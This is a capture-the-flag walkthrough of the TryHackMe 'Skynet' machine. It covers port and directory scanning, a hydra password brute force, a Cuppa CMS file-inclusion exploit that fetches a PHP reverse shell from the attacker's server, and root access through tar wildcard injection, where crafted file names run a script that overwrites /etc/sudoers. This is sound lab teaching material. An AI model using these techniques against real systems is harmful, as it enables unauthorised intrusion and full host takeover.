10 minutes
THM: Skynet
Title:Skynet
Description:A vulnerable Terminator themed Linux machine.
Difficulty:Easy
Tags:
Nmap
First we scan for open ports
# nmap -p- -T4 -sV -sC 10.10.40.240 -oA nmap
Starting Nmap 7.95 ( https://nmap.org ) at 2025-03-19 23:56 GMT
Nmap scan report for 10.10.40.240
Host is up (0.020s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Skynet
|_http-server-header: Apache/2.4.18 (Ubuntu)
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES PIPELINING AUTH-RESP-CODE SASL TOP CAPA UIDL
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: SASL-IR LITERAL+ capabilities more IMAP4rev1 LOGINDISABLEDA0001 IDLE ID ENABLE post-login listed Pre-login OK LOGIN-REFERRALS have
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-time:
| date: 2025-03-19T23:57:12
|_ start_date: N/A
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_clock-skew: mean: 1h39m47s, deviation: 2h53m12s, median: -12s
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2025-03-19T18:57:12-05:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.91 seconds
Multiple ports found, so we just need to work our way through them methodically
Website
There doesnt appear to much functionality on the website, so lets run a directory scan
# gobuster dir -u http://10.10.40.240 -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.240
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/admin (Status: 301) [Size: 312] [--> http://10.10.40.240/admin/]
/.htaccess (Status: 403) [Size: 277]
/config (Status: 301) [Size: 313] [--> http://10.10.40.240/config/]
/css (Status: 301) [Size: 310] [--> http://10.10.40.240/css/]
/index.html (Status: 200) [Size: 523]
/js (Status: 301) [Size: 309] [--> http://10.10.40.240/js/]
/server-status (Status: 403) [Size: 277]
/squirrelmail (Status: 301) [Size: 319] [--> http://10.10.40.240/squirrelmail/]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Even looking through these results there is nothing we can use at the moment, so lets check another port
SMB
First lets list any available shares
# smbclient -L 10.10.40.240
Password for [WORKGROUP\root]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
The only share we can connect to without credentials is the anonymous one
smbclient //10.10.40.240/anonymous
Password for [WORKGROUP\root]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 16:04:00 2020
.. D 0 Tue Sep 17 08:20:17 2019
attention.txt N 163 Wed Sep 18 04:04:59 2019
logs D 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5750160 blocks available
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 05:42:16 2019
.. D 0 Thu Nov 26 16:04:00 2020
log2.txt N 0 Wed Sep 18 05:42:13 2019
log1.txt N 471 Wed Sep 18 05:41:59 2019
log3.txt N 0 Wed Sep 18 05:42:16 2019
9204224 blocks of size 1024. 5750160 blocks available
smb: \logs\>
Downloading the 2 files (log2 and log3 are 0 bytes) attention.txt has the following message, and log1.txt appears to be a password list
# cat attention.txt
A recent system malfunction has caused various passwords to be changed. All skynet employees are required to change their password after seeing this.
-Miles Dyson
Brute force login
Using the new information its time to try logging in to any services we can. Using hydra and crackmapexec we can test ssh and smb, but neither work. However we did find a webmail login earlier to we try that with hydra
# hydra -l milesdyson -P log1.txt 10.10.40.240 http-form-post "/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown"
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-20 00:27:30
[DATA] max 16 tasks per 1 server, overall 16 tasks, 31 login tries (l:1/p:31), ~2 tries per task
[DATA] attacking http-post-form://10.10.40.240:80/squirrelmail/src/redirect.php:login_username=^USER^&secretkey=^PASS^:Unknown
[80][http-post-form] host: 10.10.40.240 login: milesdyson password: c*********************r
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-20 00:27:37
With this working login we can get into squirrel mail and see the below email with another password
SMB - Authenticated
Using the new creds we can now login to the milesdyson smb share
# smbclient //10.10.40.240/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 10:05:47 2019
.. D 0 Wed Sep 18 04:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 10:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 10:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 10:05:14 2019
notes D 0 Tue Sep 17 10:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 10:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 10:05:14 2019
9204224 blocks of size 1024. 5749996 blocks available
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 10:18:40 2019
.. D 0 Tue Sep 17 10:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 10:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 10:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 10:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 10:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 10:01:29 2019
important.txt N 117 Tue Sep 17 10:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 10:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 10:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 10:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 10:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 10:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 10:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 10:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 10:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 10:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 10:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 10:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 10:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 10:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 10:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 10:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 10:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 10:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 10:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 10:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 10:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 10:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 10:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 10:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 10:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 10:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 10:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 10:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 10:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 10:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 10:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 10:01:29 2019
9204224 blocks of size 1024. 5749996 blocks available
The interesting looking file in the one called important.txt so lets download that
# cat important.txt
1. Add features to beta CMS /4**************d
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
Website - CMS
With the new discoverd web directory we can see another page
However this is a fairly blank site, so lets do a directory scan again
# gobuster dir -u http://10.10.40.240/4**************d -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.40.240/4**************d
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 277]
/.htaccess (Status: 403) [Size: 277]
/.htpasswd (Status: 403) [Size: 277]
/administrator (Status: 301) [Size: 337] [--> http://10.10.40.240/4**************d/administrator/]
/index.html (Status: 200) [Size: 418]
Progress: 4614 / 4615 (99.98%)
===============================================================
Finished
===============================================================
Checking out the administrator directory gives us a login page for Cuppa CMS
Looking at exploit-db there is a vulnerable page that allows the loading and executing of php code without authentication. We will use the pentest monkey php shell, host it with a basic python server, and then call it from the vulnerable endpoint which will give us a reverse shell back
# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.40.240 - - [20/Mar/2025 01:19:08] "GET /shell.php HTTP/1.0" 200 -
# nc -lvnp 6666
listening on [any] 6666 ...
connect to [10.11.18.78] from (UNKNOWN) [10.10.40.240] 50270
Linux skynet 4.8.0-58-generic #63~16.04.1-Ubuntu SMP Mon Jun 26 18:08:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
20:18:55 up 1:24, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
$ cd /home
$ ls
milesdyson
$ cd milesdyson
$ ls
backups
mail
share
user.txt
$ cat user.txt
7******************************7
Privlege escalation
Checking cronjobs we can see there is a script being run as root every minute
$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
cat: /etc/cron.weekly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
$ cat /home/milesdyson/backups/backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
As the tar process is backing up everything using a wildcard we can abuse this. We will get it to run a script for to add our account to sudoers so that we can then just move to root
$ cd /var/www/html
$ echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
$ echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh"
$ echo "/var/www/html" > --checkpoint=1
$
$ sudo -l
User www-data may run the following commands on skynet:
(root) NOPASSWD: ALL
$ sudo su
id
uid=0(root) gid=0(root) groups=0(root)
cat /root/root.txt
3******************************9